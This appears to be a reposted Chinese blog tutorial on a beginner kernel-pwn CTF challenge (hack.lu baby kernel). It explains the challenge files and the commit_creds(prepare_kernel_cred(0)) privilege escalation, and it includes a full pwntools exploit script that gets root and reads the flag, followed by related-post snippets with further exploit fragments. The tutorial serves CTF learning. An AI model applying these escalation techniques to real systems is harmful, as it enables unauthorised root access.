First Kernel-pwn

最新推荐文章于 2024-02-27 21:55:50 发布
最新推荐文章于 2024-02-27 21:55:50 发布
阅读量265 收藏
点赞数
文章标签: python shell
原文链接:http://www.cnblogs.com/ZHijack/p/9835495.html
版权

Kernel pwn-极简题目的操作模式

完全参照M4x师傅的指导,用 hacklu的baby kernel迈了第一步

题目附带文件说明

一般题目会给出bzImage,.cpio, .sh文件

  • sh文件适用于启动kernel的shell脚本文件,参数决定了内核的保护情况。

  • .cpio文件为文件系统映像。将其解压可以获得服务器交互程序的客户端

  • bzImage为kernel binary,可视为压缩后的文件

  • vmlinux文件(if exists), 未经压缩的kernel文件,为ELF格式。

    • 如果没有vmlinux文件,可以通过extract-vmlinux提取

    • ./extract-vmlinux ./bzImage > vmlinux

基本操作

  1. 获得服务器文件系统环境

    解压cpio文件,能够获得服务器内部文件分布,包括创建环境的init脚本和交互程序。

    在inti文件中,通过insmod命令加载驱动模块 

    insmod /lib/modules/4.4.72/babydriver.ko

    一般情况下,被加载的LKM即为漏洞所在。

    .ko文件也是ELF文件格式,可以通过ida进行分析。

    可以通过分析交互elf文件,确定交互逻辑和调用内核模块的??

  2. 提权

    最常用的提权手段:

    commit_creds(prepare_kernel_cred(0))

    两个函数的地址可以在 /proc/kallsyms中查看。

    vmlinux是未压缩的kernel文件(ELF格式),可以通过vmlinux提取到gadget,当然也可以从vmlinux文件中获取上面两个函数的地址。

  3. loadling…

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 
from pwn import *
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
# io = process('./client_kernel_baby')
io = remote('arcade.fluxfingers.net', 1817)
kernel = ELF('./vmlinux')

# get the address of 2 functions from vmlinux
cred = kernel.sym['prepare_kernel_cred']
commit = kernel.sym['commit_creds']

# run prepare kernel cred(0) and get the return value
io.recvuntil('----- Menu -----')
io.sendlineafter('> ', '1')
io.sendlineafter('>', str(cred))
io.sendlineafter('>', '0')
io.recvuntil('It is: ')
ret_val = int(io.recvuntil('\n', drop = True),16)

# run commit cred to get root private
io.sendlineafter('> ', '1')
io.sendlineafter('>', str(commit))
io.sendlineafter('>', str(ret_val))

# read flag as root
io.sendlineafter('> ', '3')
io.sendlineafter('>', 'flag')

io.interactive()

 

 

 

 


作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/9835495.html

aoque9909
关注
kernel pwn ——(1)
qq_39869547的博客
03-17 412
文件 to_pwner.tar.xz 解压命令: xz -d to_pwner.tar.xz 再次解压:tar -xvf to_pwner.tar 之后获得 src文件夹 获得src文件夹 ,里面包含了启动脚本startvm.sh 和问题驱动mod.ko, bzImage 是经过压缩的原始内核文件。 运行脚本尝试获得一些信息: 加载进来,是在别的目录里,驱动程序应该是一开始就已经加载了的,...
PWN入门学习
qq_20254219的博客
10-20 2598
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
2018 0CTF Finals Baby Kernel
weixin_46483787的博客
04-14 343
kernel的第三天,仍然很不想学 拿到题目先看看启动项 #!/bin/sh mount -t proc none /proc mount -t sysfs none /sys mount -t devtmpfs devtmpfs /dev echo "flag{this_is_a_sample_flag}" > flag chown root:root flag chmod 400 flag exec 0</dev/console exec 1>/dev/console exec 2
openEuler x86_64 extract-vmlinux生成内核vmlinux 源码编译生成vmlinux 配置kdump crash分析内核崩溃kernel panic
hknaruto的专栏
12-20 993
采用VirtualBox虚拟机测试CPU信息操作系统及内核信息系统默认开启了kdump,查看服务状态查看内核命令行参数对应/boot/grub2/grub.cfgvmcore生成路径配置/etc/kdump.conf。
linux之vmlinux、vmlinuz、System.map和/proc/kallsyms简介
小立仔
05-31 1万+
vmlinux、vmlinuz、System.map和/proc/kallsyms简介
extract-vmlinux 脚本分析
qq_40227064的博客
04-10 859
extrect-vmlinux,解析vmlinuz脚本分析
pwn 进阶(1)
weixin_44113469的博客
02-07 952
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛复盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
pwn 进阶(2)
weixin_44113469的博客
02-07 415
pwn improve(2) 0x01 plan1(produce vulnerable program ) my important jop is to Debugger。 pwn1(20200315) this topic is anther lgd,the topic i produced before。 [key point]: 1.heap overlap 2.seccomp 3.rop 4.shellcode wp: there is a heap overlap in the add fun
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
Kernel PWN入门——Kernel ROP
最新发布
weixin_66578482的博客
02-27 1035
本笔记参考自Kernel ROP - CTF Wiki ,主要记录步骤以及学习过程中的一些思考,主要用来复习,例题是强网杯 2018 - core。Kernel PWN入门——Kernel ROP 环境搭建 分析题目 找gadget 看start.sh 看init 内核启动 分析驱动文件 EXP getshell 题目给了 bzImage,core.cpio,start.sh 以及 vmlinux 四个文件,接下来简单介绍一下。
Linux 启动过程分析
程序员的那些事
03-18 414
(点击上方公众号,可快速关注)英文:Alison Chaiken,翻译:Linux中国/jessie-panglinux.cn/article-9437-1.html理解运转良好的系统对于处理不可避免的故障是最好的准备。关于开源软件最古老的笑话是:“代码是自具文档化的self-documenting”。经验表明,阅读源代码就像听天气预报一样:明智的人依然出门会看看室外的天气。本文讲述了如何运用调试
如何测试centos7.x crash 工具
palm_m的专栏
05-17 725
检测内核配置 挂载iso,配置本地yun源 安装kexec 安装kdump工具 通过vmlinuxz-* 压缩内核获得 vmlinux 非压缩内核 extract-vmlinux /boot/vmlinuxz-* > vmlinux 压缩内核的查看,解压压缩内核的查看 file /boot/vmlinuxz-* file /boot/vmlinux 运行crash工具...
Linux内核之vmlinuz反汇编
weixin_30905133的博客
07-11 881
本文介绍在Fedora上对Linux内核的vmlinuz进行反汇编。如果内核是debug版本,可以用来查看某个函数的源代码。 1. 安装kernel-devel软件包 dnf -y install kernel-devel 2. 提取vmlinux vmlinux是一个包括Linux kernel的静态链接的可运行文件。 vmlinuz是vmlinux经过gzip和...
二十分钟Linux ftrace原理抛砖引玉
Netfilter
11-30 6459
周末要去忙别的事情,所以没有时间总结些东西了,那就今晚写简单点吧。 我们可以通过objdump -D看到内核模块或者用户态程序里面的函数开头的指令,以便知道如果想hook它的话,要预先备份多少指令。 但是如何看到内核函数的开头几个指令呢? 我试图去objdump系统boot目录下的vmlinux,但是什么也看不到。这里说一句,如果你的/boot目录下只有vmlinuz,那么首先你必须将其解压成v...
linux内核pwn,Linux Kernel Pwn 0:1
weixin_36473811的博客
04-29 219
0x00 Setup#基础概念#vmlinux 是未压缩的可执行内核文件vmlinuz 是压缩后的可执行文件 包括bzimage\zimageinitrd (initial ramdisk)是用于启动时临时引导硬件到内核的临时文件系统内核向下控制管理硬件,向上提供应用运行环境运行环境#apt-get install qemu-system启动命令示例qemu-system-x86_64 -init...
linux内核态real cred,Linux内核源码分析 -- 更新当前进程的 cred -- commit_creds
weixin_28957683的博客
05-07 821
浅析一下用来修改当前进程 cred 的函数 commit_creds源码版本:Linux kernel 5.9.9首先来看 cred 结构/** The security context of a task** The parts of the context break down into two categories:** (1) The objective context of a tas...
pwn level1、level2
qq_43613772的博客
07-24 1024
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值